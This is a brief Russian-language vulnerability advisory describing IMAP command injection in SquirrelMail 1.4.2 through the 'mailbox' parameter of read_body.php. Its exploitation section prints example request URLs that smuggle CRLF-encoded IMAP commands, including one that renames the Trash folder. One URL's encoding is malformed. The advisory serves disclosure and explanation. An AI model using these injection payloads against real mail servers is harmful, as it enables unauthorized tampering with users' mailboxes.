Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SquirrelMail.
Компьютер для продвинутых
пользователей
Содержание:
SquirrelMail
ПО: SquirrelMail
Версия: -
О софте:
SquirrelMail стандартно укомплектованный webmail пакет написанный на
PHP4. Содержит внутри поддержку IMAP и SMTP протоколов и все страницы
написаны на HTML 4.0 для максимальной совместимости со всеми браузерами.
Продукт имеет очень малые требования и очень легок в настройке и
установке. SquirrelMail содержит все что вы ждете от почтового клиента,
встроенная поддержка MIME, адресная книга и возможность управления
папками.
http://www.squirrelmail.org
Уязвимость:
SquirrelMail работает с почтовым сервером через интерактивный
графический интерфейс используя IMAP и SMTP протоколы. Правильность
ввода команд и информации проходит проверку в течении использовании
приложения. Так атакующий может вводить произвольные команды IMAP/SMTP
серверов в письмо. Это очень опасно из-за возможности инъекции с помощью
команд, позволяющих атакующему поднять свои привилегии и использовать
уязвимости, которые существуют на сервере с помощью команд.
Использоваине:
== IMAP пример (версия 1.4.2) =============
SquirrelMail уязвимый параметр: "mailbox"
Когда пользователь кликает на поле "Тема" письма, то создается запрос:
http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
Атакующих может изменить параметр "mailbox" и вставить любую IMAP
команду:
http:///src/read_body.php?mailbox=INBOX%22%0D%0%0D%0A%20SELECT%20%22INBOX&passed_id=&startMessage=1
Пример:
http:///src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1